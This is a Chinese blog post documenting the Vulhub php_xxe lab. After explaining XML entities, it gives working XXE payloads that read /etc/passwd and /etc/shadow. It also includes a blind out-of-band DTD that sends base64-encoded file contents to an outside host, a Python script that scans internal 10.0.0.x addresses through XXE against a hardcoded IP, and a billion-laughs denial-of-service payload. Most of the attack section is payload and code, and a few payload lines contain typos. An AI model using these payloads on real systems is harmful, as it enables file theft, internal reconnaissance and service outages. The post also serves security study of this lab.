Vulhub-php_xxe

最新推荐文章于 2024-07-30 21:39:07 发布
最新推荐文章于 2024-07-30 21:39:07 发布
阅读量908 收藏 1
点赞数 1
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/xmd213131/article/details/105384795
版权
本文详细介绍了PHP中的XXE(XML External Entity)注入漏洞,包括实体概念、外部实体、参数实体的讲解,并通过四个实验展示了XXE注入的不同场景:简单的XXE、使用外部DTD的XXE、Blind OOB XXE和DOS攻击。通过这些实验,揭示了XXE如何读取文件、执行远程命令以及可能导致的拒绝服务风险。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

php_xxe
实体的概念:

命名实体
命名实体(在 XML 规范中也称为内部实体)就是我们在谈论 “实体” 时所指的实体。命名实体在 DTD 或内部子集(即文档中 <!DOCTYPE> 语句的一部分)中声明,php_在文档中用作引用。在 XML 文档解析过程中,实体引用将由它的表示替代。
举例:
这里有DTD的详解

<?xml version="1.0" encoding="utf-8"?> #xml定义,表明了版本以及编码方式
<!DOCTYPE test[ #内部DTD
	<!ELEMENT test ANY> #声明了一个约束元素,任何内容都可以
	<!ENTITY xxe "test"> #一个内部实体,名字是xxe 内容为“test”
]>
<test>
	<name>&xxe;</name>对实体的引用
</test>

外部实体
外部实体表示外部文件的内容。

内部DTD:

<?xml version="1.0" encodiing="utf-8"?>
<!DOCTYPE test[
	<!ELEMENT test ANY>
	<!ENEITY test SYSTEM "file:///etc/passwd">  #这里使用了system
]>
<root>
<name>&test;</name>
</root>

外部DTD:

<!ENTITY % payload SYSTEM "flie:///etc/passwd">
<!ENTITY % test STSTEM "<!ENTITY &#37; pass SYSTEM 'http://test/index.php?test=%payload'>">
 #这是一个叫test.dtd的文件

<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE test[
	<!ENTITY % cmd "http://test.dtd">
	%cmd;
	%payload;
	%test;
]>

参数实体:
(1)使用 % 实体名(这里面空格不能少) 在 DTD 中定义,并且只能在 DTD 中使用 %实体名; 引用
(2)只有在 DTD 文件中,参数实体的声明才能引用其他实体
(3)和通用实体一样,参数实体也可以外部引用

总结就是实体就相当于c++语言中的一个变量但又不是很相同,它可以存储和传输数据,同时又可以解析其内容。

注意:xml对于大小写敏感,xml中不允许出现%,<,>等等,要使用的话必须要经过转义,xml只能有一个根节点

转载于:添加链接描述

xxe注入的原理:添加链接描述

实验1:简单的xxe

payload:

<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE xxe(这个xxe是根元素) [
<!ENTITY xxe SYSTEM "file:///etc/passwd">
]>
<xxe>
&xxe;
</xxe>

在这里插入图片描述
实验2:使用外部DTD的简单xxe

payload:

<?xml version="1.0" encoding="utf-8"?> 
<!DOCTYPE root [
<!ENTITY % start "<![CDATA[">   
<!ENTITY % goodies SYSTEM "file:///etc/shadow">  
<!ENTITY % end "]]>">  
<!ENTITY % dtd SYSTEM "http://309k59m623.wicp.vip/test.dtd"> 
%dtd; ]> 

<root>&all;</root>

外部DTD:

<?xml version="1.0" encoding="UTF-8"?> 
<!ENTITY all "%start;%goodies;%end;">

上面这种方式是因为xml不许出现<>和%,而在外部DTD中则没有这个限制
解析过程:
先解析了%dtd,而dtd引入了一个外部实体,外部实体中又引用了%start,%goodies,%end,这样最终就用<![CDATA[***]]>要输出的文件包裹了起来,就可以读取文件中含有<>的内容了
在这里插入图片描述

实验3:Blind OOB XXE

payload:

<!DOCTYPE convert [ 
<!ENTITY % remote SYSTEM "http://309k59m623.wicp.vip/test.dtd">
%remote;%int;%send;
]>

外部DTD:

<!ENTITY % file SYSTEM "php://filter/read=convert.base64-encode/resource=file:///etc/passwd"> #使用base64对输出的字符进行了编码
<!ENTITY % int "<!ENTITY &#37; send SYSTEM 'http://309k59m623.wicp.vip/test.php?id=%file;'>"> #将前面的输出作为这里get参数的输入,然后再保存于本地的txt文件中

这个用法主要就是针对于没有回显的xxe注入,通过oob的方式将我们要的数据给拿到了,注意在int中声明的参数实体的%要用html进行编码,否则会出现这种情况:
在这里插入图片描述
正确的显示:
在这里插入图片描述
尽管这里出现了warning但是可以看到还是读取到了我们想要的内容:
在这里插入图片描述
这里也可以进行远程命令的执行,但是前提是要安装了excpet扩展
这里也可以进行对于内外网的端口扫描
内网payload:

<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE root [
<!ELEMENT test ANY>
<!ENTITY % scan SYSTEM "http://127.0.0.1:81">
%scan;
]>
<root>
<test>4</test>
</root>

在这里插入图片描述
可以看到如果是等待了很久或者 Connection refused那么一般就是没有打开这个端口或者被防火墙过滤了,如果大佬们知道怎么样更好的去扫描端口请给我说一下。
大佬的脚本:

import requests
import base64

#Origtional XML that the server accepts
#<xml>
#    <stuff>user</stuff>
#</xml>


def build_xml(string):
    xml = """<?xml version="1.0" encoding="ISO-8859-1"?>"""
    xml = xml + "\r\n" + """<!DOCTYPE foo [ <!ELEMENT foo ANY >"""
    xml = xml + "\r\n" + """<!ENTITY xxe SYSTEM """ + '"' + string + '"' + """>]>"""
    xml = xml + "\r\n" + """<xml>"""
    xml = xml + "\r\n" + """    <stuff>&xxe;</stuff>"""
    xml = xml + "\r\n" + """</xml>"""
    send_xml(xml)

def send_xml(xml):
    headers = {'Content-Type': 'application/xml'}
    x = requests.post('http://34.200.157.128/CUSTOM/NEW_XEE.php', data=xml, headers=headers, timeout=5).text
    coded_string = x.split(' ')[-2] # a little split to get only the base64 encoded value
    print coded_string
#   print base64.b64decode(coded_string)
for i in range(1, 255):
    try:
        i = str(i)
        ip = '10.0.0.' + i #这里的ip改为你扫描对象内网的ip
        string = 'php://filter/convert.base64-encode/resource=http://' + ip + '/'
        print string
        build_xml(string)
    except:
continue

实验4:DOS攻击

<?xml version="1.0" ?>
<!DOCTYPE lolz [<!ENTITY lol "lol"><!ELEMENT lolz (#PCDATA)>
<!ENTITY lol1 "&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;">
<!ENTITY lol2 "&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;">
<!ENTITY lol3 "&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;">
<!ENTITY lol4 "&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;">
<!ENTITY lol5 "&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;">
<!ENTITY lol6 "&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;">
<!ENTITY lol7 "&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;">
<!ENTITY lol8 "&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;">
<!ENTITY lol9 "&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;">
<tag>&lol9;</tag>

分析:
可以看到,首先定义了实体lol 其内容是字符串“lol”,然后在实体lol1中多次引用了lol,实体lol2又多次引用了实体lol1,那么可以看出,每一个实体对于上一个实体的引用都会导致字符串呈现几何级的增长,以至于到最后出现上亿条字符串,从而让服务器拒绝服务。

以上就是我目前能够了解到的知识,对于XML Schema以后再看吧

PHP代码审计之XXE(XML外部实体注入)
qq_22132931的博客
12-08 910
PHP代码审计之XXE(XML外部实体注入)
vulhub漏洞—php环境XML外部实体注入漏洞(XXE
weixin_45808483的博客
12-17 1039
PHP环境 XML外部实体注入漏洞(XXEXXE知识总结 环境介绍: PHP 7.0.30 libxml 2.8.0 libxml2.9.0以后,默认不解析外部实体,导致XXE漏洞逐渐消亡。为了演示PHP环境下的XXE漏洞,本例会将libxml2.8.0版本编译进PHP中。PHP版本并不影响XXE利用。 vulhub搭建漏洞: github位置:https://github.com/vulhub/vulhub/tree/master/php/php_xxe 使用如下命令编译
Vulhub--php_xxe
firecjh的博客
06-10 208
Vulhub上的php xml实体注入复现过程。启动环境访问版本查看www目录重新设置端口将Bp抓的包发送给repeater将GET包改为POST并写入payload后发送查看响应。
[Vulhub] PHP环境 XML外部实体注入漏洞(XXE
weixin_45605352的博客
05-07 4175
0x01 预备知识 XXE是什么? XXE(XML External Entity Injection)也就是XML外部实体注入,XXE漏洞发生在应用程序解析XML输入时,XML文件的解析依赖libxml 库,而 libxml2.9 以前的版本默认支持并开启了对外部实体的引用,服务端解析用户提交的XML文件时,未对XML文件引用的外部实体(含外部一般实体和外部参数实体)做合适的处理,并且实体的URL支持 file:// 和 ftp:// 等协议,导致可加载恶意外部文件和代码,造成 任意文件读取、命令执行、
vulhubPHP环境XML外部实体注入漏洞(XXE
Gjqhs的博客
03-08 1113
Vulhub 靶场安装_Gjqhs的博客-优快云博客 查询对应镜像 打开docker systemctl start docker 设置docker自启动 systemctl enable docker 查看docker状态 systemctl status docker 查找xxe镜像 docker search php_xxe 拉取镜像,(有可能超时,如下) 启动xxe服务 访问即可见此页面,可看到其版本为2.8.0。 http:...
VulnHub-XXE
热门推荐
江左盟的博客
11-28 1万+
简介 本以为该靶机是利用XXE获取权限,做的过程中才发现该靶机不已拿权限为目的,该靶机为CTF题,目的在于学习XXE漏洞。 靶机下载地址:https://www.vulnhub.com/entry/xxe-lab-1,254/ 信息收集 使用nmap --min-rate 10000 192.168.142.136 --script=vuln -sV扫描目标主机发现开启80和5355端口,80端口中间件为Apache 2.4.27,存在robots.txt文件,如图: 访问80端口为Apache默认页面,
vulhub靶机通关) XXE LAB: 1
yang1234567898的博客
01-16 2899
靶机下载地址:https://download.vulnhub.com/xxe/XXE.zip 信息收集: 主机IP:192.168.43.48 开放了80端口 目录扫描:发现robots.txt 查看robots.txt,发现admin.php,还有一个xxe目录 直接访问admin.php报404,应该是不在根目录 扫描192.168.43.48/xxe目录,发现admin.php 访问xxe,是一个登录页面,应该就是admin.php 尝试弱口令和注入无果...
PHP环境 XML外部实体注入漏洞(XXE
weixin_45022281的博客
10-13 1768
PHP环境 XML外部实体注入漏洞(XXE) 漏洞描述: libxml2.9.0以后,默认不解析外部实体,导致XXE漏洞逐渐消亡。为了演示PHP环境下的XXE漏洞,本例会将libxml2.8.0版本编译进PHP中。PHP版本并不影响XXE利用。 风险等级: 高 影响版本: libxml2.8.0版本 漏洞复现: [1] dom.php 读取敏感文件 Simple XXE Payload: <?xml version="1.0"?> <!DOCTYPE ANY[ <!E
XXE漏洞
qi_SJQ_的博客
01-21 646
概念 全称XML External Entity Injection, 即xml外部实体注入漏洞,导致可加载恶意外部文件,造成文件读取、命令执行、内网端口 扫描、攻击内网网站等危害。 了解一些xml,我们知道xml是一种数据存储类型,用于传输,而html用于显示。 XML被设计为数据和存储数据,XML文档结构包括XML声明、DTD文档类型定义(可 选)、文档元素,其焦点是数据传输工具。 自己当初的学习笔记 XML与HTML的主要差异: XML被设计为传输和存储数据,其焦点是数据的内容。 HTML被设.
php代码审计之xxe
qq_42307546的博客
06-04 708
xml
vulnhub-XXE
战神/calmness的博客
07-14 541
目录 信息探测:netdiscover ​访问80端口 存在XXE请求包信息 可以看到用户名密码是通过xml传递给后端的 查看用户名信息 /etc/passwd PHP伪协议 /xxe/admin.php /xxe/flagneout.php /etc/.flag.php PHPStudy 信息探测:netdiscover 访问80端口 存在XXE请求包信息 可以看到用户名密码是通过xml传递给后端的 查看用户名信息 /et...
php_xxe
qq_52579508的博客
07-17 209
正常的一般提交数据 都是 username = admin password= 123456。看这个xxe 的 漏洞 一般看包里面是否存在 这种标签 或者 存在xml 的格式。这是xxe_lab 里面的php xxe的题目。在下面xml 数据里面要有 相当于是个变量。发送过去返回的格式就是 text/html。ENTITY f 这里的 f。输入 admin 123456 之后。很想html 和xml 的 语法。所以就输出了 123123。
php xxe ***
weixin_33910759的博客
04-26 140
php entites:预定义的:&amp;&lt;&#37;一般实体:<!ENTITY general "hello">,调用方式:在<a>&general;</a>,不能包含在属性中。参数实体:<!ENTITY % param "world">,调用方式,立即使用:%param;一般实体和参数...
【渗透测试】XXE(外部实体注入):PHP_XXE解题简记
weixin_53972936的博客
10-26 1753
XXE漏洞发生在应用程序解析XML输入时,并没有禁止外部实体的加载,当允许引用外部实体时,通过构造恶意内容,可导致读取任意文件、执行系统命令、探测内网端口、攻击内网网站等危害。
php xxe注入,PHP XXE漏洞
weixin_33764463的博客
03-10 534
PHP xml 外部实体注入漏洞(XXE)1.环境PHP 7.0.30Libxml 2.8.0Libxml2.9.0 以后 ,默认不解析外部实体,对于PHP版本不影响XXE的利用2.原理介绍XML 被设计为传输和存储数据,其焦点是数据的内容。 HTML 被设计用来显示数据,其焦点是数据的外观。 HTML 旨在显示信息,而 XML 旨在传输信息。XML特点,XML 被设计用来结构化、存储以及传输信息...
vulnhub之XXE靶机详解
天天学安全专属博客
03-20 982
vulnhub之XXE靶机详解
XXE-lab-master靶场:PHP_xxe
weixin_68416970的博客
07-30 1600
XXE-lab-master:PHP_xxe的练习教程
XXE—实体注入、XXE-lab-master(php_xxe WriteUp)
weixin_41487522的博客
06-25 2178
XXE—实体注入 XXE是什么? XXE=xml external entity 即外部实体,从安全角度理解成XML External Entity attack 外部实体注入攻击 典型的攻击如下: 定义实体必须写在DTD部分。 什么是XML? XML 指可扩展标记语言(EXtensible Markup Language) XML 是一种标记语言,很类似 HTML XML 的设计宗旨是传输数据,而非显示数据 XML 标签没有被预定义。您需要自行定义标签。 XML 被设计为具有自我描述性。 XML 是 W3
pikachu-maste中xxe
最新发布
01-08
同时配合使用 [DOMDocument::loadHTML()](https://www.php.net/manual/en/domdocument.loadhtml.php) 方法代替原始的 load 函数也能有效规避某些类型的 XXE 攻击向量。 #### 预防建议 为了进一步降低遭受此类攻击的...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值